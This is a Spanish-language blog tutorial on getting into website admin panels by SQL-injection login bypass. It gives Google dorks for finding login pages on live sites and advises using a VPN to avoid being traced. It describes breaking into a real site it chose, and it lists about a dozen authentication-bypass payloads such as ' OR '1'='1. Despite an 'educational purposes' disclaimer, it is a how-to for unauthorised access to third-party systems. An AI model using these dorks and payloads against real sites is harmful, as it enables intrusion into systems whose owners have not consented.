Saludos en este tutorial les explicare como hacer un bypass a paginas con vulnerabilidad en los logins o ingresos a paneles de administración sin necesidad de usar herramientas.
TODO LO QUE ENSEÑAMOS AQUÍ ES CON FINES EDUCATIVOS, NO NOS RESPONSABILIZAMOS DEL MAL USO DE ESTE TUTORIAL.
En el tutorial pasado de como injectar una web con sqlmap te explicamos el uso de las Dorks, en este caso vamos a a usar las siguientes dorks:
inurl:»/panel» site:com <– depende de ustedes el site puede ser site:ec, site:co, site:ar, site:org, site:net
inurl:»/panel/login.php» site:com
inurl:»/login» site:com
inurl:»/admin» site:com
inurl:»/administracion» site:com
inurl:»/ingreso» site:com
Nota importante antes de proceder a escanear una pagina web necesitas protegerte con una buena vpn para que te esconda tu ip real, ya que te pueden hacer seguimientos y te puedes meter en problemas. vpn recomendables: Hotspotvpn, SecurityKiss, Flyvpn, Psiphon, Tor
Escogemos cualquiera y nos vamos a google y ponemos buscar ahora escogemos unos de los resultados en mi caso yo usé inurl:»/panel» site:com y escogi la siguiente web la cual tapare el nombre por ética:
Como no sabemos los usuarios y las claves, el siguiente paso será colocar lo siguiente tanto en usuario como en clave ‘OR’1’=’1
¿Qué es lo que hace ese código?
su función es confundir la sentencia de condición permitiendo el paso inmediato al panel administrativo
Una vez ingresado hemos accedido al panel de administracion sin saber el usuario ni clave 3;)
Nota importante si no te funciona prueba con:
‘or ‘1’=’1′
‘or ‘1’=’1′–
‘or ‘1’=’1’#
‘or ‘1’=’1’/*
‘or 1=1 or »=’
‘or 1=1
‘or 1=1–
‘1=1#
‘or 1=1/*
or 1=1–
Hasta aquí el tutorial si te gustó comparte y comenta si te funcionó